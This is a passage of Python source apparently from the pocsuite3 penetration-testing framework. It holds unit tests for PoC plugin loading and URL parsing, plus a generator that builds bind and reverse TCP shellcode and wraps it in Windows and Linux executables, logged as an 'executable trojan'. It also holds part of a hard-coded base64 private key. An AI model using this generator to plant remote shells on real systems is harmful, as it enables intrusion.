            b'dExxUGlWZkd5em9rMVA1VmhPdndPTlUKVDVlbFNYNVRIOVNpTU1jWUFBK2ttSDZOWEJ0R0UySTBk'
            b'UWJtZWRFMUFvR0JBS2xkMnlHTll2eDZMc1F1czlOWgpjVlZNWHFLbFVKY1pSTVY5aGdTdTQ3alZI'
            b'ZnlMMVFRcTFnaG1rU0NpeGVZWXJLSW4xU09ubERsK2VwYTQ3SmxqClhhd3ZNRFREWmxRRGxwS05v'
            b'dEgzbThLQUZ0VUVvQ2dzTm5zM3ZoOERDSXFJUEJEMDRndkV3R3pLYnNhQUM1WGIKUFprd1o0TlFK'
            b'RWlDTnRyMUR6Qmg0ZktuCi0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0K'
        )
        hard_coded_cert = base64.b64decode(hard_coded_cert_base64)
        with open(filepath, "wb+") as fw:
            fw.write(hard_coded_cert)


def minimum_version_required(ver):
    from pocsuite3 import __version__
    from packaging.version import parse as parse_version
    v1, v2 = parse_version(ver), parse_version(__version__)
    if v1 > v2:
        logger.warning(f'The minimum version required for this PoC plugin is {ver}, '
                       f'you installed {__version__}, please consider upgrading pocsuite3.')
        from pocsuite3.lib.core.data import conf
        from pocsuite3.lib.core.update import update
        conf.update_all = True
        update()



import os
import unittest

from pocsuite3.api import init_pocsuite
from pocsuite3.api import load_file_to_module, paths, load_string_to_module


class TestCase(unittest.TestCase):
    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_get_info(self):
        init_pocsuite({})
        poc_filename = os.path.join(paths.POCSUITE_POCS_PATH, '20190404_WEB_Confluence_path_traversal.py')
        mod = load_file_to_module(poc_filename)
        print(mod.get_infos())
        self.assertTrue(len(mod.get_infos()) > 0)

    def test_get_info_from_string(self):
        source = r"""
from collections import OrderedDict

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.api import OptString


class DemoPOC(POCBase):
    vulID = '00000'  # ssvid
    version = '1.0'
    author = ['chenghs']
    vulDate = '2019-2-26'
    createDate = '2019-2-26'
    updateDate = '2019-2-25'
    references = ['']
    name = '自定义命令参数登录例子'
    appPowerLink = 'http://www.knownsec.com/'
    appName = 'test'
    appVersion = 'test'
    vulType = 'demo'
    desc = '''这个例子说明了你可以使用console模式设置一些参数或者使用命令中的'--'来设置自定义的参数'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _options(self):
        o = OrderedDict()
        o["username"] = OptString('', description='这个poc需要用户登录，请输入登录账号', require=True)
        o["password"] = OptString('', description='这个poc需要用户密码，请输出用户密码', require=False)
        return o

    def _verify(self):
        result = {}
        payload = "username={0}&password={1}".format(self.get_option("username"), self.get_option("password"))
        r = requests.post(self.url, data=payload)
        print(r.text)
        if r.status_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Postdata'] = payload

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
        """.strip()
        init_pocsuite({})
        mod = load_string_to_module(source)
        print(mod.get_infos())
        self.assertTrue(len(mod.get_infos()) > 0)



import os
import tempfile
import textwrap
import unittest

from pocsuite3.api import get_results, init_pocsuite, start_pocsuite


# https://stackoverflow.com/questions/23212435/permission-denied-to-write-to-my-temporary-file
class CustomNamedTemporaryFile:
    """
    This custom implementation is needed because of the following limitation of tempfile.NamedTemporaryFile:

    > Whether the name can be used to open the file a second time, while the named temporary file is still open,
    > varies across platforms (it can be so used on Unix; it cannot on Windows NT or later).
    """

    def __init__(self, mode="wb", delete=True):
        self._mode = mode
        self._delete = delete

    def __enter__(self):
        # Generate a random temporary file name
        file_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
        # Ensure the file is created
        open(file_name, "x").close()
        # Open the file in the given mode
        self._tempFile = open(file_name, self._mode)
        return self._tempFile

    def __exit__(self, exc_type, exc_val, exc_tb):
        self._tempFile.close()
        if self._delete:
            os.remove(self._tempFile.name)


class TestCase(unittest.TestCase):
    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_target_url_format(self):
        with CustomNamedTemporaryFile("w+t") as f:
            poc_content = textwrap.dedent(
                """\
                    from pocsuite3.api import POCBase, register_poc


                    class TestPoC(POCBase):
                        def _verify(self):
                            result = {}
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['url'] = self.url
                            result['VerifyInfo']['scheme'] = self.scheme
                            result['VerifyInfo']['rhost'] = self.rhost
                            result['VerifyInfo']['rport'] = self.rport
                            result['VerifyInfo']['netloc'] = self.netloc
                            return self.parse_output(result)


                    register_poc(TestPoC)
            """
            )
            f.write(poc_content)

            # http://127.0.0.1:8080
            f.seek(0)
            config = {
                "url": "http://127.0.0.1:8080",
                "poc": f.name,
            }
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "http://127.0.0.1:8080"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "http")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 8080)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:8080")

            # https://127.0.0.1:8080
            f.seek(0)
            config = {
                "url": "https://127.0.0.1:8080",
                "poc": f.name,
            }
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "https://127.0.0.1:8080"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "https")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 8080)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:8080")

            # 127.0.0.1
            f.seek(0)
            config = {
                "url": "127.0.0.1",
                "poc": f.name,
            }
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "http://127.0.0.1:80"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "http")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 80)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:80")

            # 127.0.0.1:8443
            f.seek(0)
            config = {
                "url": "127.0.0.1:8443",
                "poc": f.name,
            }
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "https://127.0.0.1:8443"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "https")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 8443)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:8443")

            # [fd12:3456:789a:1::2]:8443
            f.seek(0)
            config = {
                "url": "[fd12:3456:789a:1::2]:8443",
                "poc": f.name,
            }
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "https://[fd12:3456:789a:1::2]:8443"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "https")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "fd12:3456:789a:1::2")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 8443)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "[fd12:3456:789a:1::2]:8443")

    def test_url_protocol_correct(self):
        with CustomNamedTemporaryFile("w+t") as f:
            poc_content = textwrap.dedent(
                """\
                    from pocsuite3.api import POCBase, register_poc, POC_CATEGORY


                    class TestPoC(POCBase):
                        protocol = POC_CATEGORY.PROTOCOL.FTP

                        def _verify(self):
                            result = {}
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['url'] = self.url
                            result['VerifyInfo']['scheme'] = self.scheme
                            result['VerifyInfo']['rhost'] = self.rhost
                            result['VerifyInfo']['rport'] = self.rport
                            result['VerifyInfo']['netloc'] = self.netloc
                            return self.parse_output(result)


                    register_poc(TestPoC)
            """
            )
            f.write(poc_content)
            print(f.name)

            # https://127.0.0.1
            f.seek(0)
            config = {"url": "https://127.0.0.1", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "ftp://127.0.0.1:21"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "ftp")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 21)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:21")

            # 127.0.0.1
            f.seek(0)
            config = {"url": "127.0.0.1", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "ftp://127.0.0.1:21"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "ftp")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 21)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:21")

            # 127.0.0.1:8821
            f.seek(0)
            config = {"url": "127.0.0.1:8821", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "ftp://127.0.0.1:8821"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "ftp")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 8821)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:8821")

            # ftp://127.0.0.1:8821
            f.seek(0)
            config = {"url": "ftp://127.0.0.1:8821", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "ftp://127.0.0.1:8821"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "ftp")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 8821)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:8821")

    def test_set_protocol_and_default_port(self):
        with CustomNamedTemporaryFile("w+t") as f:
            poc_content = textwrap.dedent(
                """\
                    from pocsuite3.api import POCBase, register_poc, POC_CATEGORY


                    class TestPoC(POCBase):
                        protocol = POC_CATEGORY.PROTOCOL.FTP
                        protocol_default_port = 10086

                        def _verify(self):
                            result = {}
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['url'] = self.url
                            result['VerifyInfo']['scheme'] = self.scheme
                            result['VerifyInfo']['rhost'] = self.rhost
                            result['VerifyInfo']['rport'] = self.rport
                            result['VerifyInfo']['netloc'] = self.netloc
                            return self.parse_output(result)


                    register_poc(TestPoC)
            """
            )
            f.write(poc_content)

            # https://127.0.0.1
            f.seek(0)
            config = {"url": "https://127.0.0.1", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "ftp://127.0.0.1:10086"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "ftp")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 10086)
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:10086"
            )

            # https://127.0.0.1:21
            f.seek(0)
            config = {"url": "https://127.0.0.1:21", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "ftp://127.0.0.1:21"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "ftp")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 21)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:21")

    def test_custom_protocol_and_default_port(self):
        with CustomNamedTemporaryFile("w+t") as f:
            poc_content = textwrap.dedent(
                """\
                    from pocsuite3.api import POCBase, register_poc, POC_CATEGORY


                    class TestPoC(POCBase):
                        protocol = "CUSTOM"
                        protocol_default_port = 10086

                        def _verify(self):
                            result = {}
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['url'] = self.url
                            result['VerifyInfo']['scheme'] = self.scheme
                            result['VerifyInfo']['rhost'] = self.rhost
                            result['VerifyInfo']['rport'] = self.rport
                            result['VerifyInfo']['netloc'] = self.netloc
                            return self.parse_output(result)


                    register_poc(TestPoC)
            """
            )
            f.write(poc_content)

            # https://127.0.0.1
            f.seek(0)
            config = {"url": "https://127.0.0.1", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "custom://127.0.0.1:10086"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "custom")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 10086)
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:10086"
            )

            # https://127.0.0.1:8080
            f.seek(0)
            config = {"url": "https://127.0.0.1:8080", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "custom://127.0.0.1:8080"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "custom")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 8080)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:8080")

    def test_custom_protocol(self):
        with CustomNamedTemporaryFile("w+t") as f:
            poc_content = textwrap.dedent(
                """\
                    from pocsuite3.api import POCBase, register_poc, POC_CATEGORY


                    class TestPoC(POCBase):
                        protocol = "CUSTOM"

                        def _verify(self):
                            result = {}
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['url'] = self.url
                            result['VerifyInfo']['scheme'] = self.scheme
                            result['VerifyInfo']['rhost'] = self.rhost
                            result['VerifyInfo']['rport'] = self.rport
                            result['VerifyInfo']['netloc'] = self.netloc
                            return self.parse_output(result)


                    register_poc(TestPoC)
            """
            )
            f.write(poc_content)

            # 127.0.0.1:443
            f.seek(0)
            config = {"url": "127.0.0.1:443", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "https://127.0.0.1:443"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "https")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 443)
            self.assertEqual(res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:443")

    def test_custom_default_port(self):
        with CustomNamedTemporaryFile("w+t") as f:
            poc_content = textwrap.dedent(
                """\
                    from pocsuite3.api import POCBase, register_poc, POC_CATEGORY


                    class TestPoC(POCBase):
                        protocol_default_port = 10443

                        def _verify(self):
                            result = {}
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['url'] = self.url
                            result['VerifyInfo']['scheme'] = self.scheme
                            result['VerifyInfo']['rhost'] = self.rhost
                            result['VerifyInfo']['rport'] = self.rport
                            result['VerifyInfo']['netloc'] = self.netloc
                            return self.parse_output(result)


                    register_poc(TestPoC)
            """
            )
            f.write(poc_content)

            # 127.0.0.1
            f.seek(0)
            config = {"url": "127.0.0.1", "poc": f.name}
            init_pocsuite(config)
            start_pocsuite()
            res = get_results()
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["url"], "https://127.0.0.1:10443"
            )
            self.assertEqual(res[0]["result"]["VerifyInfo"]["scheme"], "https")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rhost"], "127.0.0.1")
            self.assertEqual(res[0]["result"]["VerifyInfo"]["rport"], 10443)
            self.assertEqual(
                res[0]["result"]["VerifyInfo"]["netloc"], "127.0.0.1:10443"
            )



import struct
import time
import os
from pocsuite3.lib.core.data import paths, logger
from pocsuite3.lib.core.enums import OS, OS_ARCH, SHELLCODE_CONNECTION
from pocsuite3.lib.core.common import (
    validate_ip_addr,
    port_to_hex,
    port_to_dd,
    ip_to_hex,
    ip_to_dd,
    create_shellcode,
    read_binary,
    get_public_type_members,
)


class ShellGenerator:
    def __init__(self, os_target, os_target_arch):
        self.OS_TARGET = os_target
        self.OS_TARGET_ARCH = os_target_arch
        self.utils = ['nasm', 'objdump']
        self.shellcodes_root = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')
        self.use_precompiled = self.check_for_system_utils()

    def check_settings(self, addr, port):
        if self.OS_TARGET not in get_public_type_members(OS, only_values=True):
            raise Exception('Can\'t generate shellcode for OS: %s' % self.OS_TARGET)
        if self.OS_TARGET_ARCH not in ['32bit', '64bit']:
            raise Exception('Can\'t generate shellcode for ARCH: %s' % self.OS_TARGET_ARCH)
        if not validate_ip_addr(addr):
            raise Exception('IP address %s is not valid' % addr)
        if not 0 <= port <= 65535:
            raise Exception('PORT %s is not valid' % port)

    def check_for_system_utils(self):
        """Checks utils. If any util is not exists precompiled shellcodes will be used"""
        import platform
        if platform.system().lower() == 'windows':
            return False
        is_nix_cmd_exists = lambda x: any(os.access(os.path.join(path, x), os.X_OK)
                                          for path in os.environ["PATH"].split(os.pathsep))
        for util in self.utils:
            if not is_nix_cmd_exists(util):
                return True
        return False

    def _make_path(self, *paths):
        path = os.path.join(self.shellcodes_root, self.OS_TARGET)
        if self.OS_TARGET_ARCH == OS_ARCH.X64:
            path = os.path.join(path, 'x64')
        if not self.use_precompiled:
            path = os.path.join(path, 'src')
        return os.path.join(path, *paths)

    def get_shellcode(self, shellcode_type, connectback_ip="127.0.0.1", connectback_port=5555, make_exe=0, debug=0,
                      filename="", dll_inj_funcs=None, shell_args=None, use_precompiled=True):
        if shell_args is None:
            shell_args = {}
        if dll_inj_funcs is None:
            dll_inj_funcs = []
        self.check_settings(connectback_ip, connectback_port)
        filepath = ''
        if self.use_precompiled:
            logger.info('Some utils needed for shellcode compilation are not found. Only precompiled shellcodes can be used.')
        self.use_precompiled = use_precompiled or self.use_precompiled
        ext = '.bin' if self.use_precompiled else '.asm'
        if shellcode_type == SHELLCODE_CONNECTION.BIND:
            path = self._make_path('bind_tcp' + ext)
            if self.use_precompiled:
                values = dict(BIND_PORT=port_to_hex(connectback_port))
            else:
                values = dict(BIND_PORT=port_to_dd(connectback_port))
        elif shellcode_type == SHELLCODE_CONNECTION.REVERSE:
            path = self._make_path('reverse_tcp' + ext)
            if self.use_precompiled:
                values = dict(CONNECTBACK_IP=ip_to_hex(connectback_ip),
                              CONNECTBACK_PORT=port_to_hex(connectback_port))
            else:
                values = dict(CONNECTBACK_IP=ip_to_dd(connectback_ip),
                              CONNECTBACK_PORT=port_to_dd(connectback_port))
        # handle custom shellcode
        else:
            path = os.path.join(self.shellcodes_root, shellcode_type + ext)
            values = shell_args
        shell = self.read_and_replace(path, values, use_precompiled)
        if not self.use_precompiled:
            shell, filepath = create_shellcode(shell, self.OS_TARGET, self.OS_TARGET_ARCH, make_exe,
                                               debug=debug, filename=filename, dll_inj_funcs=dll_inj_funcs)
        if debug:
            logger.debug('Shellcode generated with length=%s' % len(shell))
            logger.debug(b''.join(b'\\x%02x' % x for x in shell))
        if (make_exe or dll_inj_funcs) and self.use_precompiled:
            exe_gen = ShellcodeToExe(shell, self.OS_TARGET, self.OS_TARGET_ARCH,
                                     filename=filename, dll_inj_funcs=dll_inj_funcs)
            if make_exe:
                filepath = exe_gen.create_executable()
                if debug:
                    logger.debug('Executable trojan is generated: %s' % filepath)
            if dll_inj_funcs:
                filepath = exe_gen.create_executable()
                if debug:
                    logger.debug('DLL is generated: %s' % filepath + '.dll')
        return shell, filepath

    @staticmethod
    def read_and_replace(path, values, use_precompiled):
        def to_hex(data):
            return b''.join(b'\\x%02x' % x for x in data)

        shell = read_binary(path)
        for key, value in values.items():
            if use_precompiled:
                value = to_hex(value)
            shell = shell.replace(key.encode(), value)
        if use_precompiled:
            shell = bytes.fromhex(shell.replace(b'\\x', b'').decode())
        return shell


class ShellcodeToExe:
    def __init__(self, shellcode, target_os, target_arch, filename='', dll_inj_funcs=''):
        self.shellcode = shellcode
        self.target_os = target_os
        self.target_arch = target_arch
        self.dll_inj_funcs = dll_inj_funcs
        self.filename = filename if filename else time.strftime('%Y%m%d%H%M%S', time.gmtime())
        self.path = paths.POCSUITE_TMP_PATH

    def mkdirs(self):
        if not os.path.exists(self.path):
            os.mkdir(self.path)

    def create_win_x86_exe(self):
        header = b'\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd' \
                 b'\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f' \
                 b'\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a' \
                 b'\x24\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4c\x01\x02\x00\xd3\x7c\xb5\x58\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\xe0\x00\x0f\x03\x0b\x01\x02\x1b\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x10\x00\x00\x00\x02\x00\x00' \
                 b'\x04\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x02\x00\x00' \
                 b'\x1a\x89\x00\x00\x03\x00\x00\x00\x00\x00\x20\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00' \
                 b'\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x14\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x74\x65\x78\x74\x00\x00\x00' \
                 b'\x63\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x20\x00\x50\x60\x2e\x69\x64\x61\x74\x61\x00\x00\x14\x00\x00\x00\x00\x20\x00\x00' \
                 b'\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x30\xc0' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00'
        data = header + self.shellcode
        data += b'\xFF' * 4 + b'\x00' * 4 + b'\xFF' * 4
        data = data.ljust(1536, b'\x00')
        return data

    def create_win_x86_64_exe(self):
        header = b'\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd' \
                 b'\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f' \
                 b'\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a' \
                 b'\x24\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x64\x86\x02\x00\xe8\x5d\xb6\x58\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\xf0\x00\x2f\x02\x0b\x02\x02\x1b\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00' \
                 b'\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x02\x00\x00' \
                 b'\x9a\x9e\x00\x00\x03\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x20\x02\x00\x00\x00\x10\x00\x00' \
                 b'\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x50\x60' \
                 b'\x2e\x69\x64\x61\x74\x61\x00\x00\x14\x00\x00\x00\x00\x20\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x30\xc0\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00'
        data = header + self.shellcode
        data += b'\x00' * 7 + b'\xFF' * 8 + b'\x00' * 8 + b'\xFF' * 8
        data = data.ljust(2048, b'\x00')
        return data

    def create_linux_x86_exe(self):
        header = b'\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00' \
                 b'\x60\x80\x04\x08\x34\x00\x00\x00\x1c\x01\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x28\x00' \
                 b'\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xff\x10\x00\x00' \
                 b'\xff\x10\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        data = header + self.shellcode
        return data

    def create_linux_x86_64_exe(self):
        header = b'\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x3e\x00\x01\x00\x00\x00' \
